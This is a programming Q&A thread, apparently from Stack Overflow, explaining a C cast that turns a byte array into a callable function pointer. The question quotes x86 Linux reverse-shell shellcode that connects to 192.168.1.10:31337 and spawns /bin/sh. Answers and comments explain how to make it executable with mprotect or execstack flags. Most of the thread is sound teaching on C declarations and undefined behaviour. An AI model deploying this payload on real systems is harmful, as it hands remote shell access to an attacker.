# What does int (*ret)() = (int(*)())code mean?

Tags: c, exploit, shellcode

Here is a copy of code from shellstorm:

```
#include <stdio.h>
/*
ipaddr 192.168.1.10 (c0a8010a)
port 31337 (7a69) 
*/
#define IPADDR "\xc0\xa8\x01\x0a"
#define PORT "\x7a\x69"

unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
IPADDR"\x66\x68"PORT"\x66\x53\xfe"
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
"\x80";

main() 
{
 printf("Shellcode Length: %d\n", sizeof(code)-1);
 int (*ret)() = (int(*)())code;
 ret();
}
```

Could anyone help me explain this one "int (*ret)() = (int(*)())code;" ? 
How does it work? Why it can make the code above run?

Comment: This is not kernel code. So `linux-kernel` is not appropriate tag.

Comment: casting a char pointer to a function pointer! Now that's undefined behaviour. You can only assign a function pointer (any type) to a function pointer.

Answer (score 12):

```
int(*ret)()
```

declares a function pointer named `ret`; the function takes unspecified arguments and returns an integer.

```
(int(*)())code
```

casts the `code` array to a function pointer of that same type.

So this converts the address of the `code` array to a function pointer, which then allows you to call it and execute the code.

Note that this is technically undefined behavior, so it doesn't *have* to work this way. But this is how practically all implementations compile this code. Shellcodes like this are not expected to be portable -- the bytes in the `code` array are dependent on the CPU architecture and stack frame layout.

Comment: +1 for mentioning unspecified number and type of arguments. Many people erroneously think that `int func(void)` and `int func()` are the same. They are in `C++` but not in `C`.

Comment: Also casting array to a function pointer is undefined behaviour. Don't know how I missed it.

Comment: I've added a comment about portability to the answer.

Answer (score 5):

You should read a good C programming book, such as [*Modern C*](https://modernc.gforge.inria.fr/). You could even read [this draft C11 standard](http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1570.pdf) or look into [this C reference](https://en.cppreference.com/w/c) website.

`int (*ret)()` declare a pointer to function returning an `int` -without specifying arguments (in C)

Then `= (int(*)())code;` is initializing `ret` with the casted address of `code`.

At last `ret();` is calling that function pointer, hence invoking the machine code in your `code` array.

BTW, the compiler (and the linker) might put `code` in a read-only but non-executable segment (this perhaps depends upon how your program was linked). And then your shell code might not work.

I recommend enabling all warnings and debug info in your compiler. With [GCC](http://gcc.gnu.org/) in 2020, that means compiling [with](https://gcc.gnu.org/onlinedocs/gcc/Invoking-GCC.html) `gcc -Wall -Wextra -g` and later use [GDB](https://www.gnu.org/software/gdb/).

On Linux, you might even use [strace(1)](https://man7.org/linux/man-pages/man1/strace.1.html) or [ltrace(1)](https://man7.org/linux/man-pages/man1/ltrace.1.html) to understand the behavior of your executable.

Comment: 1+ for the essential BTW.

Comment: typecasting the function pointer is redundant here because if `code` has a different signature then it will cause undefined behaviour.

Answer (score 3):

```
int (*ret)()
```

defines the function pointer `ret` as function returning an `int` with an unspecified number of arguments.

```
... = (int(*)())code;
```

casts the `unsigned char`-array `code` to the type of function `ret` would refer to and assigns it to `ret`.

This call

```
ret();
```

then executes the op-codes stored in `code`.

All in all not a nice thing.

Answer (score 2):

`int (*)()` is the type of a pointer to a function with the following prototype:

```
int func();
```

Because of the way the language is parsed and the precedence of the operators, one has to put the asterisk in brackets. Also when declaring a pointer variable of that type, the name of the variable goes after the asterisk and not after the type, e.g. it is not

```
int (*)() ret;
```

but rather

```
int (*ret)();
```

In your case the `ret` variable is both being declared and initialised with a type cast involved.

To call a function through a function pointer, you could either use the more elaborate syntax:

```
(*ret)();
```

or the more simple one:

```
ret();
```

Using the former syntax is preferable since it gives indication to the reader of your code that `ret` is actually a pointer to a function and not the function itself.

Now, in principle that code should not actually work. The `code[]` array is placed in the initialised data segment, which in most modern OSes is not executable, i.e. the call `ret();` should rather produce a segmentation fault. E.g. GCC on Linux places the `code` variable in the `.data` section:

```
.globl code
    .data
    .align 32
    .type   code, @object
    .size   code, 93
code:
    .string "1\3001\3331...\200"
```

and then the `.data` section goes into a non-executable read-write segment:

```
$ readelf --segments code.exe

Elf file type is EXEC (Executable file)
Entry point 0x4003c0
There are 8 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  PHDR           0x0000000000000040 0x0000000000400040 0x0000000000400040
                 0x00000000000001c0 0x00000000000001c0  R E    8
  INTERP         0x0000000000000200 0x0000000000400200 0x0000000000400200
                 0x000000000000001c 0x000000000000001c  R      1
      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000
                 0x000000000000064c 0x000000000000064c  R E    100000
  vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
  LOAD           0x0000000000000650 0x0000000000500650 0x0000000000500650
                 0x0000000000000270 0x0000000000000278  RW     100000
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  DYNAMIC        0x0000000000000678 0x0000000000500678 0x0000000000500678
                 0x0000000000000190 0x0000000000000190  RW     8
  NOTE           0x000000000000021c 0x000000000040021c 0x000000000040021c
                 0x0000000000000020 0x0000000000000020  R      4
  GNU_EH_FRAME   0x0000000000000594 0x0000000000400594 0x0000000000400594
                 0x0000000000000024 0x0000000000000024  R      4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     8

 Section to Segment mapping:
  Segment Sections...
   00     
   01     .interp
   02     .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version
          .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini
          .rodata .eh_frame_hdr .eh_frame
   03     .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
   04     .dynamic
   05     .note.ABI-tag
   06     .eh_frame_hdr
   07
```

The segment is missing the executable flag, i.e. it is only `RW` and not `RWE`, therefore no code could be executed from that memory. And indeed, running the program results in a fault at the very first instruction stored in `code`:

```
(gdb) run
Starting program: /tmp/code.exe 
Shellcode Length: 92

Program received signal SIGSEGV, Segmentation fault.
0x0000000000500860 in code ()
(gdb) up
#1  0x00000000004004a7 in main () at code.c:27
27     ret();
(gdb) print ret
$1 = (int (*)()) 0x500860 <code>
```

To make it work, you could use a combination of `posix_memalign` and `mprotect` to allocate a memory page and make it executable, then copy the content of `code[]` there:

```
// For posix_memalign()
#define _XOPEN_SOURCE 600
#include <stdlib.h>
// For memcpy()
#include <string.h>
// For sysconf()
#include <unistd.h>
// For mprotect()
#include <sys/mman.h>

size_t code_size = sizeof(code) - 1;
size_t page_size = sysconf(_SC_PAGESIZE);
int (*ret)();

printf("Shellcode Length: %d\n", code_size);
posix_memalign(&ret, page_size, page_size);
mprotect(ret, page_size, PROT_READ|PROT_WRITE|PROT_EXEC);
memcpy(ret, code, code_size);
(*ret)();
```

Also note that the shell code uses `int 0x80` to call into the Linux kernel. This won't work out-of-the-box if the program is compiled on a 64-bit Linux system as there a different mechanism is used to make system calls. `-m32` should be specified in that case to force the compiler generate a 32-bit executable.

Comment: +1 for explaining the bracket mess in the first part of the answer. Regarding the second part. Another way for making `code[]` array executable is to compile the source file with `-fno-stack-protector -z execstack` flags passed to GCC.

Answer (score 1):

```
int (*ret)() = (int(*)())code;
```

`int (*ret)()` defines a pointer that points to a function which returns `int` and has unspecified number of arguments; `(int(*)())code` is a type casting, let the other part could treat `code` as a function pointer, the same type as `ret`.

By the way, depends on the contents of `code`, this code may only works on a specific CPU and OS combination, if it even works and all.

Answer (score 1):

Your program will produce undefined behaviour. C99 spec, section 6.2.5, paragraph 27 says:

> A pointer to void shall have the same representation and alignment
>   requirements as a pointer to a character type. Similarly, pointers to
>   qualiﬁed or unqualiﬁed versions of compatible types shall have the
>   same representation and alignment requirements. All pointers to
>   structure types shall have the same representation and alignment
>   requirements as each other. All pointers to union types shall have the
>   same representation and alignment requirements as each other. Pointers
>   to other types need not have the same representation or alignment
>   requirements.

Further, in section 6.3.2.3, paragraph 8, it also says:

> A pointer to a function of one type may be converted to a pointer to a
>   function of another type and back again; the result shall compare
>   equal to the original pointer.

This means that you should not assign a function pointer to a non-function pointer because the size of a function pointer is not guaranteed to be the same as that of a `char` pointer or a `void` pointer. Now these things out of the way, let's come to your code.

```
int (*ret)() = (int(*)())code;
```

Let's first take the lhs. So it defines `ret` to be a pointer to a function which takes a fixed but unknown number and type of arguments (doesn't sound good). On the rhs, you are typecasting an array `code`, which evaluates to a pointer to its first element to the same type as `ret`. This is undefined behaviour. Only a function pointer can be assigned to a function pointer, not a pointer to any other type for reasons explained above. Also, `sizeof` operator may not be applied to a function pointer precisely because of this reason.

In `C++`, empty parameter list means `void`, but that's not the case in `C` where it means no information is available to check against argument list provided by the caller. Hence you must explicitly mention `void`. So you should better write that statement as, assuming now that you have a function named `code` defined in your program.

```
int code(void); 
int (*ret)(void) = (int(*)(void))code;
```

To simplify things about complex `C` declarations, `typedef` might help.

```
typedef int (*myfuncptr)(void);
```

This defines a type `myfuncptr` to be of type `pointer to a function taking no arguments and returning an int`. Next, we can define a variable of `myfuncptr` type like we define a variable of any type in `C`. However please note that `code` must have the same signature as the type of the function `ret` points to. If you cast a function pointer of any other type using `myfuncptr`, it will cause undefined behaviour. Therefore, this makes typecasting redundant.

```
int code(void);
int foo(int);

myfuncptr ret = code; // typecasting not needed. Same as- myfuncptr ret = &code;
myfuncptr bar = (myfuncptr)foo;  // undefined behaviour.
```

A function name evaluates to a pointer when you assign it to, well, a function pointer of the same type. You don't need to use the address of operator `&`. Similarly, you can call the function pointed to by the pointer without dereferencing it first.

```
ret();     // call the function pointed to by ret
(*ret)()   // deferencing ret first.
```

Please read this for details - [Casting a function pointer to another type](https://stackoverflow.com/a/559671/1809377). Here's a good resource on how to mentally parse complex `C` declaration - [Clockwise/Spiral Rule](http://c-faq.com/decl/spiral.anderson.html).
Also note that the `C` standard lays down only two acceptable signature of `main`:

```
int main(void);
int main(int argc, char *argv[]);
```

Comment: very nice detail here for ummies like myself. esp appreciate the including of explicit void  and the tidbit about function names evaluating to pointers in certain cases